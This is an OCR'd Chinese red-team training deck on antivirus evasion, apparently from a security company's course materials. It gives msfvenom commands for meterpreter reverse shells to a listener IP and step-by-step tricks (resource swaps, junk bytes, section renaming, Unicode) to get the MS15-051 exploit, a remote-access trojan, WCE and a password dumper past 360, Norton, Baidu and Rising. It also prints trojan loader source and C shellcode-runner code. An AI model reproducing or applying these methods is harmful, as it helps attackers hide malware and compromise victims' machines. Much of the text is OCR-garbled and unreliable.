DAS-Security s208 


科 创 板 : 688023 


| 
| очеве 
| 















NECIO 
о 


— N — 
La UE ED ED D 

O 
00 С š / 


922220220222 
QM 








° 
=> > > > 





444444 


杭州 安 恒信 息 技术 股份 有 限 公司 
DBAPPSecurity Co., Ltd. 


(Т) 





第 九 章 红 队 自 研 


1500 


APT 攻 击 方案 模拟 


免 杀 方案 研发 
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Cooolis 系 列 
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实战 免 杀 诺顿 Shellcode 载 入 内 存 免 杀 
Shellcode 载 入 内 存 免 杀 


绕 过 诺顿 主动 、 表 面 、 通 信 拦 截 


创建 MSF 监 听 





生成 shellcode 


msfvenom -p windows/meterpreter/reverse tcp lhost=192.168.241.132 lport-8080 -е 


> 





。 -p: 指定 payload ; 

° -e; 指定 编码 方式 ; 

.-і: БАЙ; 

。 -b: 去 除 指定 代码 ， 一 般 是 空 代 码 或 者 错误 代码 ; 
。 lhost: 指定 本 机 IP; 

。 Iport: 指定 本 机 监听 端口 ; 

。 -f; 指定 生成 格式 ; 
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。 -0: 指定 生成 输出 后 存储 文件 的 位 置 


shellcode 执 行 盒 执 行 





fit: 窗口 关闭 后 session 掉 线 
诺顿 查 杀 情况 
表面 过 掉 


通信 拦截 
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Z Norton 








X Norton 


е 


Norton Bib f — $ Fi System Infected 
Meterpreter Reverse TCP HRE, 


Z711111 111. 
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建立 https 监 听 


sees 


生成 https shellcode 


msfvenom -p windows/meterpreter/reverse https lhost-192.168.241.132 lport-443 


se https 


scription 


Attempting to e d with $ iterations of x80/shikata ga nai 
x86/shikata ¢ ceed with size 603 (iteration=@} 
6 7 5 t 
succeeded 
eeded wi 
ceeded witt 


ith 


iteratio 
succeed vith si 498 
succeeded h size $25 (iteraty 


$52 (iterats 
succeeded w i 579 (iterations 
succeeded w u ге 606 (iteratio 
th l size 606 





提 权 失败 
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七 岁 小 毛 猴 


<. 
适合 人 群 
本 人 是 不 慌 c 汇编 等 语言 的 彩 笔 ， 但 是 我 能 过 杀毒 (360/ 诺 顿 /avg /nod32 等 等 ) 。 


我 也 没 人 教 就 是 看 了 网 上 教程 会 了 一 点 点 ! 


STR Li 





如 果 各 位 大 神 你 们 看 着 不 来 ， 那 么 请 你 忍 忍 不 要 喷 ! 
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免 杀 方法 
对 于 一 个 不 懂 汇编 的 人 来 说 ， 我 是 怎么 过 杀 软 的 呢 ? 
后 面 将 会 用 360 做 为 实例 来 给 拱 建 演示 。 


1 观察 杀毒 软件 报 的 病毒 名 称 ， 如 果 你 修改 后 文件 能 正常 使 用 并 且 杀 软 报 毒 名 称 变 了 ， 这 样 一 般 就 
可 以 过 掉 。 


2. 不 管 你 怎么 换 资源 或 加 壳 杀 软 一 只 报 同样 的 名 字 ， 那 么 就 去 定位 一 下 特征 码 。 
3. 不 同 的 杀毒 软件 免 杀 的 方法 略 有 不 同 。 

例如 : 360 报 qvm7 免 条 方法 是 替换 资源 文件 和 版 本 信息 。 

4. 本 人 常用 的 免 杀 方法 : 蔡 换 资源 一 加 花 一 修改 入 口 点 /加 壳 等 。 


— 
免 杀 前 的 准备 
本 次 实例 将 会 使 用 360 杀 毒 来 给 大 家 演示 。 
病毒 文件 主要 以 提 权 EXP 老 给 大 家 演示 ! 
(不 要 问 我 为 什么 不 是 远 控 ! 小 弟 过 不 了 啊 ! ) 
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i 
1 


%. 
^u SH eU "uM 
等 他 说 完 再 草 他 
1. 安 装 360 杀 毒 软件 ， 并 把 360 杀 毒 的 几 个 引擎 全 部 安装 上 更 新 最 新 病毒 库 。 


2. 我 在 测试 360 杀 毒 的 时 候 发 现 过 几 个 问题 : 
a) 不 管 你 怎么 杀 360 就 是 不 报 毒 ! 那么 请 还 原 虚 拟 机 ! 


b)360 杀 毒 安装 包 。 有 老 版 本 的 尽量 使 用 老 版 本 的 安装 包 。 应 为 新 版 本 的 即使 你 关 了 上 传 还 是 会 上 传 。 


c) 本 人 使 用 的 是 360sd_std_4,2,2.4092 版 本 。 在 安装 好 后 系统 防火 墙 会 提示 是 否 开启 安全 卫士 ! 具体 名 


> 


3.360 杀 毒 在 全 部 安装 完成 和 补丁 升级 成 功 之 后 需要 关 掉 : 可 疑 文 件 上 传 。 
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2... 2 1227 





NC 
BFP finde: НЫ» 
"oen AMES 
MOMS” Eth 
mtns Н IT aa rti 


St x HERR RUE TR w 
Bah EREET 
ЖЫШТ ЕТ ЕЕ 


Bit. ы B 





oR t $ 
HREM eB IWT: 


| 


4. 在 做 免 杀 时 请 在 断 网 环境 下 做 ! 
5.360 有 5 个 引擎 ， 再 过 的 时 候 可 以 一 个 个 去 过 。 





6. 需 要 用 到 工具 包 : 小 七 免 杀 工具 包 (其 实 就 用 几 个 工具 而 已 ) 


免 杀 实例 : ms15-051 过 360 杀 毒 4 引擎 
替换 资源 
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zm: 
术 马 程序 (frejan Generic) 


ARAARA, BT RPM . SH: MED: 


ежен an. 
全 中 心 检验 ， HAEE., icu cs M 





上 图 中 是 在 联网 环境 下 测试 : 可 以 看 到 360 云 报 了 ! (小 红 伞 本 地 也 是 报 的 ! ) 
开始 : 


WER ESQ) ЖЕ) ТАТ 





STARTER 源 文 件 ， 看 看 360 什 么 情况 ! 
3. 下 图 可 以 看 到 360 已 经 不 杀 了 ! 小 红 伞 本 地 也 不 杀 了 ! 
我 只 是 添加 了 一 个 版 本 信息 而 已 ! 
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4. 联 网 查 杀 也 是 不 杀 ! 我 就 不 上 图 了 ! 这 就 成 功 过 掉 了 360 杀 毒 


5. 附 件 : 
修改 字符 串 


>? \Documents 





(ms15-051 替 换 资 


А8) 


ІН! 515-051 fixed 


[#] us nsí5 


52 


age : 
eg: 


nt aad £ CIA 
Vindaus > {К s 


2981 


tings 


tise nts 
15 O51 
Че? muis asi 

CR 1 


and Settings Cia 


fixed h 


Documents aid Settir 





т515-051 


Hicroso 





99998F AB: 
оаваяғаа: 
paoaRrFCO: 
00008ғ00: 
POSE LD: 
| UDUDSFE GO: 
өйуйайа: 
HHP HTS: 
00909 020; 
ниви uiu: 
odo dad: 
00809058: 
9%907 HAD: 
аааайФа7а: 








020090920: 


002009 BAD: 
neagonon- 


scr 
ТТ? 








88 


an 


т 


and SettingsNCI0SSE[H]>msi5 


uh 


ЙОТ command 


“whoami /а11" 





ай 
ай 






C :ADocunent 
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-851 





28016 @2 @? + 
2016 82 
85:99:04 


and 


94 个 引擎 ! 


-€ xë 








Ж TN 
SG) ТАП) mer юп MEG 
E 9 n iD ТАҒ” 
це h 89 s VD Ar 68 
$ $ 59 5B 5p f 
6" 6 69 68 6b 6r 78 
: 79 B 7D ZI 
^ 61 6t 6 68 00 t 
+ 5 ый 6% :a 
, 1 ag р m 
6s 5 7 61 6h 
€ ht 4 t bi йй 
jt 1 , f бА 
ий аа ё 67 68 
) D 5 p 72 31 25 2D 35 31 
aXX у бн эе э? 79 28 7A vas 5r 7 
50 ? 61 а 28 
а 1 6 6b 61 м 
f 50 6 a 6р 11 
` ‘ "m s ка 


Settings 





1:29 


82 9:52:12 


е) 


Стах Ф vast 061 exe 





123556789 :;C^»?f8 
ӘНЕӘЕРЕНІ ЈК ННОР 
QRSTUUWXVZ[N]) ` 
abcdef gni jklinnop 
qrstuvwxy2{ |) 78. 
C.g.0.n.v.h... 
PsLookupProcessti 
yProcessId..User 
HegisterWVouHandi 
5.Ш5ЕКЗ2.011., 
ЕСЈН И | 





1 
fixed by 2сдопу 
ho. .{ 8] usage: m 





$15 851 conmand 
.[8] eg: ns15 


* masmi fat 


yit verssaus эт 
RegisterUouHandl 
ers.USERS2.d11.. 
.s.€.r.3.2...d 
1.1..... gSharedI 
nfo.[8] ns15- 051 

fixed by us 

[4] usage: 

HE 851 ы 

..[8] eg: ns15 
-051 “whoani /al 
1" v.v. [x] this 


l ее Dnus af eurt 








我 们 杀 一 下 看 看 ! 





H 


PP ЕАК Ж. 2016-02-02 11:29 
13153119, 2016-02-03 10:12:51 
1318 Bal, 89: 80: і 





1———————- 


C:\Docunents and SettingsNVC IAE [E] Nn 15- 051. exe 





也 成 功 过 掉 了 ! 
ИНЕ: ” (ms15-051 修 改 字符 串 ) 


添加 字符 串 


仍 c32 拖 到 最 后 ， 随 便 加 点 东西 ! 
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— 


web T(E) ЖЕ) 搜索 (5) ФЖС) TAT) жұма) 窗口 (W) MBH) 








4 bw SE 
vee wes (HEX)ms15-051.exe | 
68006766: 88 00 080 08 080 00 99 00 Өй BB DD BB ов 88 o0 POIPTCYYETELCIIIETIIT 
000087C0:| 00 GG 00 86 00 80 00 00 00 00 00 08 00 BB 00 00 | ..........-.---- 
89008700: 66 00 00 00 00 00 90 
88080В7Ғ0: 88 88 вв 90 88 
09008 7F 0: 66 88 66 66 66 
880088800: 88 88 80 99 
000888106: 68 
00008826: 88 
08008838: 88 1 
00008840: 66 68 ж” SAVE#1 
06008858: 68 В. SAVERO- >32 
00005870; ГИД ^ CROAT 
080808880: вв 88 (ORR PLATS BR s 
00008890: 98 68 
88888840: ea 
88008888: ea 
000088с0: 98 
88808800: 88 -— 
000088E 0: 00 86 
MBRGRBEB 88 aa 
000068900: 08 Gà во 08 во GO GG GO 00 OB 00 GO BB 08 88 BB j ................ 
80008910: 00 00 00 HƏ AA 00 аа 00 00 00 00 00 00 00 во 00 | CU TEC T e 
ы“ 
0000B7B0: 88 00 вв 00 вв 
0888B7C8: 88 68 08 00 00 
0800B7D0: 88 вв вв BB $9 
8000B7E0: 
8000B7F 8: 
00008800: 
090088160: 
00008820: 
990008830: 
00008830: | 
$9008859:| ; 
809088690: 
00008870: 
609088860: 
88008890: 
$89088888:| ` 
8980888B6:| 5 
980808869: 
0868888898: | 
90900088E 0: 
8888B8F R: 88 
060089086: 88 )0 98 вй 098 











来 联网 杀 一 下 看 看 ! 
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ШЕК «D KS meu) IAD ғо: жо ж»: іі 

























E E 
ae зба ~ қ | m 
wes (HEX) 15 051 еже | 
38 F^ 34 FW 38 FC JE ев зс UA Кт 
зс 1а 3€ 1с 3C 28 3С $8 3 с е 
| on 3с ав 3€ te зс ft м аа зо 75997979. 
вы 30 08 ас 39 59 30 s£ 30 СЕЕ 
60 3b 6h ét 39 78 38 7С 8^ 3r нр 
вв 3b 8С 3 94 30 98 20 9t se 20 | 7777777788 ауу 
80 бе пө ве dO 00 рә 99 DD ве да се ва Жы ала на 
ag ёё op ва да $8 ав E 
ti. $ D 
"os. 1 





< 








过 掉 了 ! 


附件 : (ms15-051 添 加 字符 串 ) 





免 杀 实例 : pr 过 360 杀 毒 4 引擎 
修改 区 段 


联网 状态 下 杀 一 下 看 看 什么 情况 ! 360 云 报 ! 
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«muss 





下 面 我 就 在 联网 情况 下 过 ! 
使 用 的 工具 : 


FSSA АЗН, ST RRS. ABI: ARIS. ARF 
Brie. ӘЖЕ 
经 过 360 安 全 中 心 检验 ,此 文件 是 森马， 建议 您 立即 处 理 。 


扫描 引擎 : 
жоқ 5198 
文件 路 私 : 


C \Documents and Settings СТАЖ apr axe 


к8 24028 


b13bb7602854 ает e35000669£4d42 c7 





of ЕЖ PE 头 信息 


@ АП: 


Acn WE ++ 11! 


修改 区 段 名 称 : 


DODDATEF CERE 
AM AMAA ГУ FA. 
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Ate My, “tt ud 


0003 


nna 


ж. 


ROffset 

00001000 
0000с000 
00008000 
00011000 


SSKA) 


mm 
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tx СТ. | 20160203120729. log – { 
LFO MBE) dato Bw WR OD 
8605 81318 E35 


— 病毒 库 版 本 ，2916-82-92 11:29 
+3} |6), 2016-82-03 12:07:29 


doses tr PESE 


ites 


TE 


як w ш жа жш аш ш эө ш я н ш ш ш ш шош ш шшш 


免 杀 实例 : 大 灰 狼 远 控 WAL 


朋友 发 我 的 时 候 是 被 小 红 伞 干 的 ! 
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恶意 软件 是 对 病毒 、 木 马 ， 妊 中 、 后 门 程序 等 危害 用 户 计 算 机 及 数据 安 
全 的 有 害 软件 的 统称 。 和 危害 较 大 。 


H3S : 
MISER 


文件 路 径 : 


C:\Documents and Set tings CIAM Ы er ver. exe 


S PERS as) : 


2abd4fd20d9s1416b752bac159feb83E 





断 网 环境 测试 。 这 个 病毒 名 字 一 般 加 一 个 加 密 壳 就 过 掉 了 ! 我 这 里 加 个 资源 ! 


ЎН 


红 伞 本 地 过 掉 ! 


DhlServer « 


mT— 4 d 
i 


GREER wits 
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总 是 这 个 时 间 
帅气 的 我 低调 登场 


免 杀 实例 : WCE 过 360 杀 毒 4 引 擎 


联网 查 : 


360 云 报 ! 


Puri Ы, лен», іы SRS. BRE 
mv. rna Be. 
crx 151 PE КҮЗЕБЕТА, D ari Pis. 2 


на”: 
жо 8519 


文件 路 径 : 


C:\Documents and Settings СТАМ лисе 1 S\wce\wea_vl_Sbeta_x 


bz 14 2E 


B40ac27051 426555 а109сс47 Ifet 


out put 





断 网 小 红 伞 报 ! 


TR. Offend. kdv. 567768 


E —— ЕТЕ ЖЕЛЕГІ E 7222 7 іл 
ЫН озунон. mao. 





扫 撕 引擎 : 
小 红 余 本 地 引擎 


文件 路 径 : 
C:\Documents and Settings \CIA\M@ wee 1.3VwceVwce ví 3beta x... 


SPER HDS) : 
4£840 ac27051 426555 а109сс47 03£«4 





我 们 加 花 看 下 变 不 变 ! 
联网 查 杀 可 以 看 到 病毒 名 字 变 了 ! 
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WRN/ ORI 0 IM 


S eer ee 








HAEL?! 已 经 过 掉 ! 
e ^ 










we Fi 


RSE Я 
poo 81318 H S 
BECA XA. 2816-02-82 11:29 


б etal, 2016-82-83 11:55:28 
ІЗДЕ ННВІ, 00:00:00 


! 
Яя 
! 


Dr 


C:\Documents and SettingsNCIAN F 2 Nuce. exe 








现在 本 地 都 过 了 ! 就 剩 联网 360 云 了 ! 


拖 c32 里 面 去 ! 拉 到 最 后 面 ! 随便 改 ! 
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ов вв 
:| во 08 80 HO GO 00 ве 00 өв HO өв HO ав 55 " Et igh 
|68 FF 68 AB 5h 41 00 68 AB 21 30 08 6h ñi OD Bg i Er 
:| 88 86 50 ба 89 25 00 00 80 00 83 Ch 9h 52 hr bs a eee 
:| 89 00 OF 89 C9 7B FD FF OF 81 СЗ 7B FD FF ЕВ O9 | .. ago 

(00032-80: 80 ве 00 ве 00 00 BO OO ов BO BƏ OO ов 08 08 əs | ............. 
|06622696: 80 ва 00 80 00 BA па OO 00 80 вв ой 00 вв HO OG 
00032EA0:| 80 00 00 BE OO OD пй OO ов OO ов 00 оо Be ов оп 
08032EB0:| 00 00 00 80 OU GO во 00 оо OO ов 00 ов ов ов вв 
 80йЗ2ҒС0: 
00032EDO: 
/00032EE 8: 
(00832EF 0: 
08832F 08: 
90832F 19: 
80032Ғ20: 
00032F38: 
00032F 40: 
80032Ғ580: 
(в00з2ғ00: 
(0002270: 
 D0032F80: 
/00032F90: 


/89032F08: 


/00032F B9: 
Ipaga2rca- 
80032FD0: 
/00032FE 0: 


1 
0032FF 0: 00 68 00 00 00 ON па GO BH во йа 00 йй оо йа оп 


| 
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—— 











нні: 
ftit RUM : 

наны»: 
налмі: 


1 00 00 88 |................ 
| 80 88 80 |................ 
| 86886 88 88 | ...........-.--- 


成 功 过 掉 360 杀毒 4 个 引擎 ! 


Б 20160203120201. 1og - 记事 本 
тізе) RE) 格式 人 0) BEY) HHH 


病毒 Æ. 2016-82-82 11:29 

iE 88118); 2016-92-03 12:02:01 
appel : 80:00:00 

Е 82-5), Ғалы 

13 «hel SR: 


TN 9 


EI ci PME Ж 
AEE d 
TAREA * 
АЗ ТА: 是 
$344 Rootkit. d 
(FARBASE: = 

fe Faun A TERR. Ж 

Е ІШ, d 
SISSE. Avira ЗЕГЕ) 


由 用 户 选 择 处 理 
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ж 


ЕМЕ! 这么 6! 


免 杀 实例 : 大 灰 狼 远 控 过 瑞星 





г > 





gts тебес Lui gend LI eit 


nts and Settings VC TÀ в 








被 干 了 ! 


MAH! 
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= ЖЕ: 简体 中 文 "Б ЖАҢЫ; : суу GRY IO ILo 


项 目 名 称 : 


EROS: 

C:\Documents and Settings СА «M Op DhiSenver exe 
要 保存 的 文件 ; 

C:\Documents anc Settngs CIA БИЕ D^ Serien zp exe 
ву: 


ar Ai 





тет: 全 部 日 志 挖 时间 查看 : 全 部 记录 


atia R ж 





免 杀 实例 : getpassword 过 百度 杀毒 
替换 资源 


百度 杀毒 默认 安装 : 原始 杀 一 下 ! 


Ë Т. 


自 定义 但 东 完 成 ， 发 现 ! 个 风险 项 





FH š фат tp BIG gf 


Game (1) 





m £ farm 
— 
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加 点 东西 ! 过 了 | 


Res Restorator 2007 — “ae Files\Ba 
RAE) BRR) SERVU digg) TAG 帮助 0 


Pa amra e s 


资源 树 资源 查看 器 ”文件 i 
т HH GetPassword32Z1. exe 名 称 
d 101 


|. 105 <. 
ORE 
ы: 


| Baidu$Sd. exe 









Ж xx 77. 
MISES 


Tw 
L4 ud GetPassworg Qi exe 
wF 


开启 监控 ! 测试 ! 无 压力 ! 
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垃圾 字符 串 


仍 c32 里 面 到 最 后 面 加 点 东西 ! 


Т 


00024690: 
98982AEA8: 
8882AE898: 
98802AE09-: 
.80920ED8: 
|,08828EE 0: 
|, OBG2AEF В: 
,80926F 90: 
,00920F 10: 
80028Ғ20: 
|,99026F30: 
09002AF ^0: 





|, 88926F80: 


090092AF98: 
| 8802AFAD: 
| 99892AFBO: 
8092AFC9: 
|,88820FD9: 
|,88820FE0: 


‘09982AFF 9: 





73 
óF 


F2 š 


89 
90 
вй 
66 
өр 
90 
en 
90 


90 
BB 
йй 
Өй 
89 
Өй 
00 
88 


wee (HEX)GetPassword321.exe 


00 
89 
pp 


99 


88 
65 
88 
90 
09 
99 
99 
90 
Dp 
80 


) 00 


66 
йй 
90 
ай 
88 
bp 
80 
99 


98 
6t 
00 
88 
BD 
88 
80 
BD 
88 
00 
ea 


68 
68 
BD 
BB 
98 
88 
66 
68 


ht 

89 
66 
99 
9й 
йй 
00 
00 
ай 
68 
00 


ай 
68 
68 
68 
68 
Б 
89 
88 


78 
88 
90 
йй 
Өй 
oa 
88 
DB 
80 
90 
80 


98 
90 
08 
80 
88 
88 
88 
88 


6E 
88 
88 
Өй 
80 
88 
90 
on 
80 
86 
68 


88 
88 
88 
88 
88 
88 
88 
88 









75 
72 
ЕВ 
8B 
00 
88 
88 
ea 
00 
60 
88 
66 
88 
68 
68 
86 
88 
88 
88 
88 
88 
80 
88 


ENEAN И 


58 
oF 

89 
98 
88 
88 
80 
68 
ай 
ай 
96 
88 
08 
Өй 
68 
68 
88 
66 
88 
98 
88 
6D 
98 


мент 


T 





( 


TT. 


> 
€ 


63 
88 
88 
88 
88 
oa 
88 
98 
06 
00 
88 
68 
68 
88 
88 
88 
88 
88 
88 
88 
61 
39 


ôl 

65 
9с 
98 
Өй 
00 
98 
66 
66 
66 
90 
66 
66 
90 
66 
ай 
66 
98 
88 
08 
Өй 
6F 
38 





| ress..UirtualPro 
| tect..ExitProces 
| S...OpenProcess! 
| oken..... 15584. 


ELE III 


...... 


................ 
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i 程序 可 能 是 最 终 版 使 用 如 果 有 BUGI 青 联系 我 , 所 
Thies STR, ARS, HEM CRIES iB 
See АЕН ВПО] 非常 方便 ? 





bt, XM СИКО RC e dhe HE, Pe BF +, ACA 


б sma 





нің шж 
2016-02-03 BELE али, Жени 
2016-02-03 主动 防御 EWEG. BOS TANI, Biti 
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BMÉ! 6 翻 了 


字体 提 权 过 百度 杀毒 (PENAL) 


原始 被 杀 








ажа (1) 





打 乱 PE 
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"Ed PEMS) 
арт 
MAG: С Det and SettinspoCTà RB eser e 


Me ыз” 
2 ama 





owvaandLineT ode суй 
Exi tProcess 

jet Cons aedi se V 
Getta: tula iN 
CloseBandle 
ReadFile 

Kein ied 





GRENER. Karita T MPA, ADSCE ANE, 
JUS RETIUM MARERE, "4-6 
М T 


шту. BRR TRIPE ILLI at 


请 原谅 我 虚拟 机 恢复 了 ! 附件 不 存在 了 ! 不 要 问 我 要 了 ! 
只 是 测试 了 当前 使 用 的 杀毒 ， 其 他 没有 测试 ， 目 测 过 不 少 ! 


总 结 


要 过 杀毒 就 要 想 尽 一 切 能 修改 程序 还 不 叫 他 损坏 的 方法 ! 


免 杀 学 习 资源 


$: 


1532 








黑客 免 杀 攻 防 


Hacker Anti AntiVirus Software Technology 


Offensive and Deter 





we 


e Qe ERCON А TROU Ke 
[ON эъ» iE де тн жип | 
© DROS Pw RRO TH tie 
WU PHRMA 6% Boomer Pear 
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远 控 木 马 极 速 免 杀 360 五 引擎 
1. 远 控 木马 极速 免 杀 360 五 引擎 


ЮША: BAL (std.huang@dbappsecurity.com.cn) 


1.1 AFI EC A MFCE 04 68326360 


绕 过 360 五 引擎 ， 通 信和 拦截 ， 键 盘 记 录 等 ， 免 杀 方 法 主要 是 内 存 加 载 ，MFC 框 架 ， 以 及 unicode 免 杀 
法 。 


1.2 工具 


visual studio 2019 (其 他 版 本 也 行 ， 这 里 我 用 的 最 新 版 本 ) 
360 杀 毒 最 新 版 5.0.0.8160 (64 位 ) 


病毒 库 日 期 2019-07-09 


1.3 远 控 木 马 源码 


由 于 文章 不 能 上 传 文件 ， 需 要 源码 可 以 找 我 


1.4 首先 打开 visual studio， 新 创建 一 个 MFC 工 程 ,并 将 小 马 
源码 文件 夹 里 面 的 两 个 h 文 件 添加 到 MFC 工 程 的 头 文件 中 
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创建 新 项 目 


最 近 使 用 的 项 目 模板 


BË MFC 应 用 


WP MFC 动态 链接 库 


MFC 应 用 


生成 具有 在 Wi 


C++ Windows 


+ 动态 链接 库 {DLL} 


Linux 控制 台 


Windows 





1.5 打开 小 马 源码 QQ.cpp, 代 码 如 下 
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de "MemLoadDll.h" 


clude "C SerDll.h" 


r shellex[]={'S','h', 


truct DLL INFO 


yl “etx NUS 


unsigned int finder; 


char 


UINT 


char 


char 


char 


char 


char 


bool 


BOOL 


BOOL 


BOOL 


BOOL 


BOOL 


char 


LoginAddr[100]; 


ServiceName[50];//ARS Ж 
ServiceDisplayName[50]; // 服 务 显示 
ServiceDescription[150]; 
UpGroup[32]; 
strRemark[32]; 
InshallShare; 


//TRUE- 16, FALSE -删除 


strPath[100]; 


CHAR szDownRun[300]; 


}d1l_info 


OXAAAAAAAA, 
р ы” 

8000, 

Tm 

ЫН io 

"n 

п, // 备 注 

FALSE, //TRUE- 不 删除 ，FALSE- 删 除 

FALSE, //TRUE -安装 共享 服务 ，FALSE -新建 服务 
FALSE, //TRUE- 1%, FALSE -删除 

FALSE, //TRUE -安装 共享 服务 ，FALSE- 新 建 服务 
TRUE, //true 为 绿色 运行 

TRUE, //trueK 

p. // 安 装 路 径 

pue / / Weit 


i 


void EncryptData(unsigned char *szRec, unsigned long nLen, unsigned long key 


unsigned long i; 
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K pi. |, mem Y rity E 
igned char ) key % 254 +88; 


БЕЗ < теп, i++) 


‘szRec A= p; 
*szRec += p; 


szRect*; 


int (WINAPI *PFN POPMSGBOX)(DLL INFO); 


adDllFromMemAndCall( const char *name) 


н -MORYMODULE hD11; 

. PFN. РОРМ5ОВОХ рїп; 

| EncryptData((unsigned char *)m MyShellCodeFileBuf,m MyShellCodeFileSize, 
hDll-MemoryLoadLibrary(m MyShellCodeFileBuf); 

if (hDll--NULL) 


return ; 


pfnz(PFN POPMSGBOX)MemoryGetProcAddress(hD11l, name); 
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if (pfn-zNULL) 

( 
MemoryFreeLibrary(hD11); 
return; 

} 

pfn(dll info); 

if (hD11!=NULL) 


{ 


MemoryFreeLibrary(hDll); 
hDll-zNULL; 


) 


ExitProcess(0); 


LoadDllFromMemAndCall(shellex); 


1.6 将 QQ.cpp 的 代码 除 最 后 一 行 外 全 部 复制 到 和 MFC 工 程 名 
称 一 样 的 cpp 文 件 内 ， 此 处 为 yk.cpp 
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1.7 将 QQ.cpp 的 代码 的 最 后 一 行 复制 到 yk.cpp 的 如 下 位 置 


Р y 
` 





1.8 依次 点 击 菜单 栏 的 生成 -> 生成 解决 方案 ， 会 有 以 下 错误 
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1.9 unicode 免 杀 法 


格式 AAAA 转换 为 _T(AAAA) 
例如 : 


HeapFreeT pHeapFree=(HeapFreeT)GetProcAddress( 


"posto tp ү? 


HeapFreel) GetProcAddres 





1.10 依 次 修改 完 所 有 错误 ， 重 新 生成 解决 方案 。 
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1.11 杀毒 测试 


360 版 本 和 漏洞 库 版 本 如 下 





杀毒 检测 情况 : 
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p] 


文件 (F) ФЕ) 格式 (D) 查看 (V) EAH) 
360 杀 毒 扫描 日 志 


病毒 库 版 本 : 2019-07-19 16:30 
扫描 时 间 : 2019-07-20 13:53:10 
扫描 用 时 : 00:00:01 
= сезж 










RE: 
ipm: 00000 
ажа: о UBER E ТРЕМ ИЯ 
RERRE: 0 зшитих: = 
扫描 压缩 包 : 否 
发 现 病毒 处 理 方式 ， 由 用 户 选 择 处 理 
扫描 磁盘 引导 区 : 是 
: | 扫描 Rootkit: 5 
wee 使 用 云 查 杀 引擎 : 是 
fiv wA TESI: 是 
扫描 建议 修复 项 : 
常规 引种 设置 : ORE 








C:\Users\he\Desktop\Tools.exe 


ge mo —— 9 













isst 


2 527 








знане: 
ЗНН: 000001 
asp: 


Bh) 2380) 





Калузі CZ88.NET} 
-пайтахх, 











2019 7.20120 41 
2019-07-20 12:00:41 


1.12 此 方法 我 一 直 在 用 ， 针 对 360 五 引擎 ， 已 经 长 达 三 个 月 
依旧 可 以 免 杀 ， 并 且 可 以 给 msf 生 成 的 shellcode 进 行 免 杀 。 


1.13 c 语 言 执行 shellcode 的 五 种 方法 
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U ‘comment (linker, "/section:.data,RWE") 
H 
gma comment (linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"") 


a comment(linker, "/INCREMENTAL:NO") 


ed char shellcode[] - 

000 OU TNR UII T 
41\x30\x8b\x76\xOc\x8b\x76\x1C\x8b\x46\x08\x8b\x7e\x20\x8b" 
36\Хх38\х4#\х18\х75\х#З\х59\хө1\ха1\хҒҒ\хе1\х60\хвЬ\хбс\х24" 
4\x8b\x45\x3c\x8b\x54\x28\x78\x01\xea\x8b\x4a\x18\x8b\x5a" 
20\x01\xeb\xe3\x34\x49\x8b\x34\x8b\x01\xee\x31\xf f\x31\xcO" 
KFo\xac\x84\xcO\x74\x07\xc1\xcf\xOd\x01\xc7\xeb\xf4\x3b\x76" 
\24\x28\x75\xe1\ xBb\x5a\x24\x01\xeb\x66\x8D\x0C\x4b\x8b\x5a" 
i "\x1e\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x10\x61\xc3\xb2" 
DU uae x29 uda vxo ves ao cz ied xe ide xe xc S2 ee XO" 
~ "\xff\xff\xff\x89\x45\x04\xbb\x7e\xd8\xe2\x73\x87\xlc\x24\x52" 
"\xe8\x8e\xff\xff\xff\x89\x45\x08\x68\x6c\x6c\x20\x41\x68\x33" 


"\х3з2\х2е\хб4\х68\х75\х73\х65\х72\х88\х5с\х24\хба\х89\хеб\х56" 
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"\xff\x55\x04\x89\xc2\x50\xbb\xa8\xa2\x4d\xbc\x87\x1ic\x24\x52" 
¥ 

"\ xe8\x64\ xf f NXffNXffNX68NX6f NX78NX58NX20NX68NX61NX67NX65Nx42" 

"\x68\x4d\x65\xX73\X73\xX31\ xdb\x88\x5c\x24\xOa\x89\xe3\x68\x58" 

"\х20\х20\х20\х68\х44\х53\х46\х21\х68\х72\х6#\хбі\х20\х68\х6#" 

"\х2с\х20\х66\х68\х48\х65\хбс\хбс\хз1\хс9\х88\х4с\х24\х10\х89" 


"\хе1\хЗ1\ха2\х52\%х53\х51\х52\х##\хаб\хЗі\хсо\х50\хҒҒ\х55\х08"; 


typedef void (__stdcall *CODE) (); 


//http://rshell.blog.163.com/blog/static/41619170201110302937361/ 


/7 第 一 种 方法 


void RunShellCode 1() 


PVOID p = NULL; 

if ((p = VirtualAlloc(NULL, sizeof(shellcode), MEM COMMIT | MEM RESERVE, РАС 
MessageBoxA(NULL, "申请 内 存 失败 "，" 提 柄 "，MB_OK ) ; 

if (!(memcpy(p, shellcode, sizeof(shellcode)))) 


MessageBoxA(NULL, "5175", "HERE", MB OK); 


CODE code =(CODE)p; 
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code( ); 


// 第 二 种 方法 


void RunShellCode 2() 


{ 
((void(*)(void))&shellcode)(); 
// 第 三 种 方法 


void RunShellCode 3() 


( 
. asm 
( 
lea eax, shellcode; 
jmp eax; 
} 
} 
// 第 四 种 方法 


void RunShellCode 4() 


asm 
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mov eax, offset shellcode; 


jmp eax; 


// 第 五 种 方法 


void RunShellCode 5() 


t 
. asm 
( 
mov eax, offset shellcode; 
.emit OxFF; 
emit OxEO; 
} 
H 


void main() 


//RunShellCode 1(); 


//RunShellCode 2(); 


//RunShellCode 3(); 


//RunShellCode_4(); 


RunShellcode_5(); 
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将 其 中 的 shellcode 替 换 为 msf 生 成 的 shellcode， 在 上 面 的 五 种 方法 中 随意 选取 一 种 方法 执行 
shellcode， 按 照 1.5 到 1.10 的 步骤 将 代码 放 入 MFC 工 程 ， 编 译 生成 ， 也 可 以 免 杀 。 
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基于 Ruby 内 存 加 载 shellcode 第 一 季 
基于 Ruby 内 存 加 载 shellcode 第 一 季 


本 季 是 为 配合 msf 在 渗透 过 程 中 无 文件 渗透 ， 提 前 做 基础 过 度 。 也 为 msf 插 件 编写 做 基础 过 度 。 


ruby shellcode 生成 如 下 : 


msfvenom -p windows/messagebox TEXT=Micropoor TITLE=Micropoor -f ruby --smallest 


agebox TEXT=Micr TIT ropanr smallest 
t.rb:55 arni - itext: : METHODS is deprecated 
No platform wa 
No Arch selected, se C SG from the payl 


tnutting r 
outputting raw 


+ 
+ 
" 
+ 

+ 

+ 

к 
+ 
+ 

+ 

+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 


(C:NUsersNJohnNDesktopsruby Hel 





附 源 码 : 
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require 'fiddle' 
require 'fiddle/import' 


require 'fiddle/types' 


